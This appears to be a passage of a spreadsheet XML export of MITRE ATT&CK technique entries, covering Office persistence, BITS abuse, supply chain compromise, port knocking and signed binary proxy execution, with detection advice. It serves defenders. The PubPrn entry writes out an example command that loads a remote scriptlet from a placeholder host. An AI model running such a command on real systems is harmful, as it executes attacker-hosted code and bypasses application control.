    <t xml:space="preserve">Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/004</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Rules</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/005</t>
  </si>
  <si>
    <t>Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules)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</si>
  <si>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Microsoft Security</t>
  </si>
  <si>
    <t>Office Application Startup: Add-ins</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/006</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</si>
  <si>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</si>
  <si>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use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows &lt;code&gt;copy /b&lt;/code&gt; command to reassemble binary fragments into a malicious payload. (Citation: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</si>
  <si>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https://attack.mitre.org/techniques/T1140</t>
  </si>
  <si>
    <t>09 July 2020</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</si>
  <si>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</si>
  <si>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Matthew Demaske, Adaptforward; Red Canary</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Network intrusion detection system, Signature-based detection</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</si>
  <si>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background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control.(Citation: Chrome Extension C2 Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>16 January 2018</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</si>
  <si>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</si>
  <si>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Chris Ross @xorrior; Justin Warner, ICEBRG</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1185</t>
  </si>
  <si>
    <t>This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.</t>
  </si>
  <si>
    <t>Justin Warner, ICEBRG</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1187</t>
  </si>
  <si>
    <t>19 June 2020</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>Sudhanshu Chauhan, @Sudhanshu_C; Teodor Cimpoesu</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</si>
  <si>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</si>
  <si>
    <t>https://attack.mitre.org/techniques/T1189</t>
  </si>
  <si>
    <t>18 April 2018</t>
  </si>
  <si>
    <t>Initial Access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</si>
  <si>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</si>
  <si>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Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)</t>
  </si>
  <si>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SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include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For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1190</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</si>
  <si>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</si>
  <si>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Containers, IaaS, Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Praetorian; Yossi Weizman, Azure Defender Research Team</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</si>
  <si>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 (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware)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(Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195</t>
  </si>
  <si>
    <t>06 January 2021</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.</t>
  </si>
  <si>
    <t>Veeral Patel</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Software Dependencies and Development Tools</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</si>
  <si>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 (Citation: Trendmicro NPM Compromise)  
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t xml:space="preserve">Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. </t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Software Supply Chain</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</si>
  <si>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 (Citation: Command Five SK 2011)  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/002</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>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Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/003</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.</t>
  </si>
  <si>
    <t>Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1197</t>
  </si>
  <si>
    <t>13 April 2021</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</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</si>
  <si>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</si>
  <si>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Brent Murphy, Elastic; David French, Elastic; Red Canary; Ricardo Dias</t>
  </si>
  <si>
    <t>Firewall, Host forensic analysis</t>
  </si>
  <si>
    <t>Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1199</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</si>
  <si>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</si>
  <si>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IaaS, Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1200</t>
  </si>
  <si>
    <t>17 August 2021</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</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</si>
  <si>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Password policies can be discovered in cloud environments using available APIs such as &lt;code&gt;GetAccountPasswordPolicy&lt;/code&gt; in AWS (Citation: AWS GetPasswordPolicy).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1201</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</si>
  <si>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</si>
  <si>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Isif Ibrahima; Regina Elwell; Sudhanshu Chauhan, @Sudhanshu_C</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1202</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</si>
  <si>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</si>
  <si>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Application control, Application control by file name or path, Static File Analysis</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</si>
  <si>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
###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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1203</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</si>
  <si>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</si>
  <si>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Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204)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</si>
  <si>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https://attack.mitre.org/techniques/T1204</t>
  </si>
  <si>
    <t>26 August 2021</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</si>
  <si>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</si>
  <si>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Oleg Skulkin, Group-IB</t>
  </si>
  <si>
    <t>User Execution: Malicious Link</t>
  </si>
  <si>
    <t>An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/001</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</si>
  <si>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</si>
  <si>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User Execution: Malicious File</t>
  </si>
  <si>
    <t>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.
While [Malicious File](https://attack.mitre.org/techniques/T1204/002)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Spearphishing](https://attack.mitre.org/techniques/T1534).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/002</t>
  </si>
  <si>
    <t>21 July 2021</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</si>
  <si>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</si>
  <si>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User Execution: Malicious Image</t>
  </si>
  <si>
    <t>Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1204/003</t>
  </si>
  <si>
    <t>30 March 2021</t>
  </si>
  <si>
    <t>Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.</t>
  </si>
  <si>
    <t>Containers, IaaS</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).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
On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>17 February 2021</t>
  </si>
  <si>
    <t>Command And Control, Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.
The Wake-on-LAN magic packet consists of 6 bytes of &lt;code&gt;FF&lt;/code&gt; followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)</t>
  </si>
  <si>
    <t>Josh Day, Gigamon</t>
  </si>
  <si>
    <t>Defensive network service scanning</t>
  </si>
  <si>
    <t>Traffic Signaling: Port Knocking</t>
  </si>
  <si>
    <t>Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1205/001</t>
  </si>
  <si>
    <t>01 July 2020</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)
Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.</t>
  </si>
  <si>
    <t>Vincent Le Toux</t>
  </si>
  <si>
    <t>Log analysis</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</si>
  <si>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 (Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1210</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</si>
  <si>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</si>
  <si>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Unpatched software or otherwise vulnerable target. Depending on the target and goal, the system and exploitable service may need to be remotely accessible from the internal network.</t>
  </si>
  <si>
    <t>Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1211</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</si>
  <si>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</si>
  <si>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Anti-virus, System access controls</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</si>
  <si>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access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1212</t>
  </si>
  <si>
    <t>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Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</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</si>
  <si>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abuse external sharing features to share sensitive documents with recipients outside of the organization.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Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213</t>
  </si>
  <si>
    <t>16 October 2021</t>
  </si>
  <si>
    <t xml:space="preserve">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Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events)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t>
  </si>
  <si>
    <t>Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Isif Ibrahima; Milos Stojadinovic; Naveen Vijayaraghavan, Nilesh Dherange (Gurucul); Praetorian; Regina Elwell</t>
  </si>
  <si>
    <t>Data from Information Repositories: Confluence</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/001</t>
  </si>
  <si>
    <t>14 February 2020</t>
  </si>
  <si>
    <t>08 June 2021</t>
  </si>
  <si>
    <t>Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators)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User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t>SaaS</t>
  </si>
  <si>
    <t>Data from Information Repositories: Sharepoint</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/002</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</si>
  <si>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</si>
  <si>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Data from Information Repositories: Code Repositories</t>
  </si>
  <si>
    <t>Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1213/003</t>
  </si>
  <si>
    <t>11 May 2021</t>
  </si>
  <si>
    <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</si>
  <si>
    <t>Itamar Mizrahi, Cymptom; Josh Liburdi, @jshlbrd; Toby Kohlenberg</t>
  </si>
  <si>
    <t>Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216</t>
  </si>
  <si>
    <t>01 September 2021</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution: PubPrn</t>
  </si>
  <si>
    <t>Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via &lt;code&gt;Cscript.exe&lt;/code&gt;. For example, the following code publishes a printer within the specified domain: &lt;code&gt;cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com&lt;/code&gt;.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second &lt;code&gt;script:&lt;/code&gt; parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is &lt;code&gt;pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct&lt;/code&gt;. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), &lt;code&gt;PubPrn.vbs&lt;/code&gt; has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to &lt;code&gt;LDAP://&lt;/code&gt;, vice the &lt;code&gt;script:&lt;/code&gt; moniker which could be used to reference remote code via HTTP(S).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>03 February 2020</t>
  </si>
  <si>
    <t>Atul Nair, Qualys</t>
  </si>
  <si>
    <t>Application Control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Browser bookmarks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bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1217</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
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t>
  </si>
  <si>
    <t>Mike Kemmerer</t>
  </si>
  <si>
    <t>Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218</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</si>
  <si>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</si>
  <si>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Hans Christoffer Gaardløs; Nishan Maharjan, @loki248; Praetorian</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Compiled HTML File</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/001</t>
  </si>
  <si>
    <t>23 January 2020</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</si>
  <si>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</si>
  <si>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Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Control Panel</t>
  </si>
  <si>
    <t>Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a &lt;code&gt;CPlApplet&lt;/code&gt; function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Even when these registered DLLs do not comply with the CPL file specification and do not export &lt;code&gt;CPlApplet&lt;/code&gt; functions, they are loaded and executed through its &lt;code&gt;DllEntryPoint&lt;/code&gt; when Control Panel is executed. CPL files not exporting &lt;code&gt;CPlApplet&lt;/code&gt; are not directly executable.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1218/002</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</si>
  <si>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</si>
  <si>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ESET</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: CMSTP</t>
  </si>
  <si>
